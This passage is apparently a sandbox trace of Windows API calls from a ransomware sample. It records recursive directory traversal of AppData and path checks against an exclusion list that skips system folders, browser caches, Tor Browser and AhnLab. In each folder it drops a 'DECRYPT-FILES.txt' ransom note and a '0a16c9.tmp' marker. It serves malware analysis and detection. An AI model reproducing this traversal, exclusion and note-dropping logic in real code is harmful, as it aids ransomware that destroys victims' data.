ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479838 [0186.270] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.270] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.270] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.270] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.270] FindNextFileW (in: hFindFile=0x479838, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0186.270] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0186.270] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0186.270] lstrcatW (in: lpString1="AppData", lpString2="\\" | out: lpString1="AppData\\") returned="AppData\\" [0186.270] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="AppData\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0186.270] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\Program Files") returned 0x0 [0186.270] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch=":\\Windows") returned 0x0 [0186.270] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\Games\\") returned 0x0 [0186.270] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.270] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.270] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.271] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.271] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.271] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\All Users") returned 0x0 [0186.271] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.271] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.271] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.271] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="AhnLab") returned 0x0 [0186.271] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.271] lstrlenW (lpString="C:\\Users\\Default\\AppData\\") returned 25 [0186.271] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.271] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\\\0a16c9.tmp") returned 36 [0186.271] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.271] GetLastError () returned 0x5 [0186.271] lstrlenW (lpString="C:\\Users\\Default\\AppData\\") returned 25 [0186.271] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.271] wsprintfW (in: param_1=0x36fece8, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\\\DECRYPT-FILES.txt") returned 43 [0186.271] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.271] lstrlenW (lpString="C:\\Users\\Default\\AppData\\") returned 25 [0186.271] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\*") returned="C:\\Users\\Default\\AppData\\*" [0186.271] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*", lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0186.271] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.271] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.272] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.272] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.272] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09cf140, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09cf140, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.272] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.272] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x66fe9c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x93e4774a, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0186.272] lstrcmpW (lpString1="Local", lpString2=".") returned 1 [0186.272] lstrcmpW (lpString1="Local", lpString2="..") returned 1 [0186.272] lstrcatW (in: lpString1="Local", lpString2="\\" | out: lpString1="Local\\") returned="Local\\" [0186.272] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="Local\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\Program Files") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch=":\\Windows") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\Games\\") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\All Users") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Local\\", lpSrch="\\AppData\\Local") returned="\\AppData\\Local\\" [0186.272] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a1d229, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0186.272] lstrcmpW (lpString1="LocalLow", lpString2=".") returned 1 [0186.272] lstrcmpW (lpString1="LocalLow", lpString2="..") returned 1 [0186.272] lstrcatW (in: lpString1="LocalLow", lpString2="\\" | out: lpString1="LocalLow\\") returned="LocalLow\\" [0186.272] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="LocalLow\\" | out: lpString1="C:\\Users\\Default\\AppData\\LocalLow\\") returned="C:\\Users\\Default\\AppData\\LocalLow\\" [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\Program Files") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch=":\\Windows") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\Games\\") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.272] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\All Users") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\LocalLow\\", lpSrch="\\AppData\\Local") returned="\\AppData\\LocalLow\\" [0186.273] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0d61240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d61240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0186.273] lstrcmpW (lpString1="Roaming", lpString2=".") returned 1 [0186.273] lstrcmpW (lpString1="Roaming", lpString2="..") returned 1 [0186.273] lstrcatW (in: lpString1="Roaming", lpString2="\\" | out: lpString1="Roaming\\") returned="Roaming\\" [0186.273] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\", lpString2="Roaming\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\") returned="C:\\Users\\Default\\AppData\\Roaming\\" [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\Program Files") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch=":\\Windows") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\Games\\") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\All Users") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="AhnLab") returned 0x0 [0186.273] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.273] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\") returned 33 [0186.273] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.273] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\\\0a16c9.tmp") returned 44 [0186.273] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.281] GetLastError () returned 0x5 [0186.281] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\") returned 33 [0186.281] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.281] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\\\DECRYPT-FILES.txt") returned 51 [0186.282] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.283] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\") returned 33 [0186.283] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\*" [0186.283] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0d61240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d61240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0186.284] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.284] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0d61240, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0d61240, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.284] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.284] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.284] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09cf140, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09cf140, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.284] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.284] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Identities", cAlternateFileName="IDENTI~1")) returned 1 [0186.284] lstrcmpW (lpString1="Identities", lpString2=".") returned 1 [0186.284] lstrcmpW (lpString1="Identities", lpString2="..") returned 1 [0186.284] lstrcatW (in: lpString1="Identities", lpString2="\\" | out: lpString1="Identities\\") returned="Identities\\" [0186.284] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="Identities\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Identities\\" [0186.284] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\Program Files") returned 0x0 [0186.284] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch=":\\Windows") returned 0x0 [0186.285] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\Games\\") returned 0x0 [0186.285] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.285] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.285] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.285] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.285] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.285] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\All Users") returned 0x0 [0186.285] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.285] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.285] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.285] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="AhnLab") returned 0x0 [0186.285] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.285] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\") returned 44 [0186.285] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.285] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\\\0a16c9.tmp") returned 55 [0186.285] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.291] GetLastError () returned 0x5 [0186.291] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\") returned 44 [0186.291] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.291] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\\\DECRYPT-FILES.txt") returned 62 [0186.291] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\identities\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.292] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Identities\\") returned 44 [0186.293] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Identities\\*" [0186.293] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0186.293] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.293] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.293] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.293] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.293] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb09f52a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.293] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.293] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb09f52a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb09f52a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0186.293] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2=".") returned 1 [0186.293] lstrcmpW (lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="..") returned 1 [0186.293] lstrcatW (in: lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpString2="\\" | out: lpString1="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" [0186.294] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\", lpString2="{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\" [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Program Files") returned 0x0 [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch=":\\Windows") returned 0x0 [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Games\\") returned 0x0 [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.294] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.294] StrStrW 